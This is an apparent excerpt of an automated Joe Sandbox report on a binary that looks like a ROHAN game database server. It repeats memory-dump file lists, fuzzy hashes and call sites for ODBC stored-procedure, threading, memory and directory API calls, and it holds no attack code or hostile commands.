                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [Rohan_ResetAssassinRegTime] (?)}
                                                                                      • API String ID: 0-2171894579
                                                                                      • Opcode ID: 136728db3ecd38324e890aae11bda67e61ec7e95b2e39fc6420ca168634ca5f8
                                                                                      • Instruction ID: 2d0bb1042cf614fd6652b0c86a85b5fae02b40bcd76f5a9975c94f218abd6718
                                                                                      • Opcode Fuzzy Hash: 136728db3ecd38324e890aae11bda67e61ec7e95b2e39fc6420ca168634ca5f8
                                                                                      • Instruction Fuzzy Hash: A001E1B5B8021ABBFB248F44CD52F797335EB44B14F108299FB182E2C4DAB569408F59
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_DeleteGuildLeaveTime] (?)},000000FD), ref: 0043A0C5
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043A107
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043A13C
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_DeleteGuildLeaveTime] (?)}, xrefs: 0043A0BC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_DeleteGuildLeaveTime] (?)}
                                                                                      • API String ID: 0-2462586396
                                                                                      • Opcode ID: 02035c71f23e46e64b3c7ab84c08033861373c7d00cce9ad1df1db392af4c169
                                                                                      • Instruction ID: aa38271fe541e67e36b25572de91d9d7ea42a6550f9fd5a8bfaf9683335b734f
                                                                                      • Opcode Fuzzy Hash: 02035c71f23e46e64b3c7ab84c08033861373c7d00cce9ad1df1db392af4c169
                                                                                      • Instruction Fuzzy Hash: 6901E5B064425C6BEB20CB44CC41FEB7325EB84714F108A89F7243E2C4C6F66D908B99
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_UpdateItemControlCnt] (?)},000000FD), ref: 0043832F
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00438371
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004383A6
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_UpdateItemControlCnt] (?)}, xrefs: 00438326
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_UpdateItemControlCnt] (?)}
                                                                                      • API String ID: 0-162017899
                                                                                      • Opcode ID: 5f5ad2b224c2110f6252c0d4f1a31f7ac39a5f1ea3d031fb46430137c449fb46
                                                                                      • Instruction ID: 8a2963c75706416692d7477e3e1901e0b08748f734065441e8ed0ee422ee2621
                                                                                      • Opcode Fuzzy Hash: 5f5ad2b224c2110f6252c0d4f1a31f7ac39a5f1ea3d031fb46430137c449fb46
                                                                                      • Instruction Fuzzy Hash: 0201E5B169021C77EB248B84CC52FA97334EB44714F20828BF7142E2C1D9B579418F68
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetIRefreshItemList_Complete] (?) },000000FD), ref: 00438AC8
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00438B0A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00438B3F
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetIRefreshItemList_Complete] (?) }, xrefs: 00438ABF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetIRefreshItemList_Complete] (?) }
                                                                                      • API String ID: 0-312987892
                                                                                      • Opcode ID: 38cc6d358956149596a87fd956413921bf6a716247fd602077216542c3f097fc
                                                                                      • Instruction ID: b5d1dcd14b1478ad9770d22c2921dfe3b7c64358b90d8f10c8323709afdf77f5
                                                                                      • Opcode Fuzzy Hash: 38cc6d358956149596a87fd956413921bf6a716247fd602077216542c3f097fc
                                                                                      • Instruction Fuzzy Hash: AA0144B1640654B7EB208F84CC42FA97374DB40719F10428AFB147E2D0D5B5B9808B69
                                                                                      APIs
                                                                                      • CreateThread.KERNEL32(00000000,00000000,00470400,?,00000000,?), ref: 00471850
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,004702C1), ref: 0047185D
                                                                                      Strings
                                                                                      • CreateWorkerThread() GameDB, xrefs: 0047188C
                                                                                      • CreateWorkerThread() LoginDB, xrefs: 0047187D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateHandleThread
                                                                                      • String ID: CreateWorkerThread() GameDB$CreateWorkerThread() LoginDB
                                                                                      • API String ID: 3032276028-3616832182
                                                                                      • Opcode ID: e4db556dedaea214b934206d0529d24c14709871a3a83eed3fefbdabc4215b9d
                                                                                      • Instruction ID: 435ceee3889ffa05912debb7faf75093adb57c7079e0ed8b8dd83869cc356f3d
                                                                                      • Opcode Fuzzy Hash: e4db556dedaea214b934206d0529d24c14709871a3a83eed3fefbdabc4215b9d
                                                                                      • Instruction Fuzzy Hash: 73015EB4E00208EFDB44EB89DC45FBE7374FB44305F1085A9E419A7292D778A905CB9A
                                                                                      APIs
                                                                                      • VirtualFree.KERNEL32(?,00080000,00004000,?,?,?,?,00000000,?,?,?,?), ref: 0046071C
                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00460770
                                                                                      • HeapFree.KERNEL32(?,00000000,?), ref: 0046077E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$Virtual$Heap
                                                                                      • String ID: ?
                                                                                      • API String ID: 2016334554-1684325040
                                                                                      • Opcode ID: 169a6d46f6a643b97ed833bbe7206866fc14d5641102e3c0e689582a8ef9f656
                                                                                      • Instruction ID: 4b9add7cbc2e140abaed4c8676e85df04007be984c37df17bc4100959eae5381
                                                                                      • Opcode Fuzzy Hash: 169a6d46f6a643b97ed833bbe7206866fc14d5641102e3c0e689582a8ef9f656
                                                                                      • Instruction Fuzzy Hash: 99C19074A002059FCB28CF58C4D0AAABBB1FF88324F24C25ED85A4B792D735E946CF55
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00461A50
                                                                                      • WaitForMultipleObjects.KERNEL32(?,004E9A10,00000000,?,?,?,?,00411CEA,00000000,Rohan_DBServer), ref: 00461B20
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountMultipleObjectsTickWait
                                                                                      • String ID:
                                                                                      • API String ID: 2792316827-0
                                                                                      • Opcode ID: b5fec8e06c63ec48b1dce2a3a05271029e9ca2f33d00822782354650ebc8ff68
                                                                                      • Instruction ID: dc24a7373b82d0f4662054ae36f5e528b717f33fbf6cb983b11cf71f3db3a86a
                                                                                      • Opcode Fuzzy Hash: b5fec8e06c63ec48b1dce2a3a05271029e9ca2f33d00822782354650ebc8ff68
                                                                                      • Instruction Fuzzy Hash: E9518375B005449FCB08DF69E99595AB7B1FF88700714826EE9069B3F6EB34BD00CB89
                                                                                      APIs
                                                                                      • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00468B27
                                                                                      • SetCurrentDirectoryA.KERNEL32(?), ref: 00468B9E
                                                                                      • CreateDirectoryA.KERNEL32(?,00000000), ref: 00468BB1
                                                                                      • SetCurrentDirectoryA.KERNEL32(?), ref: 00468BCD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
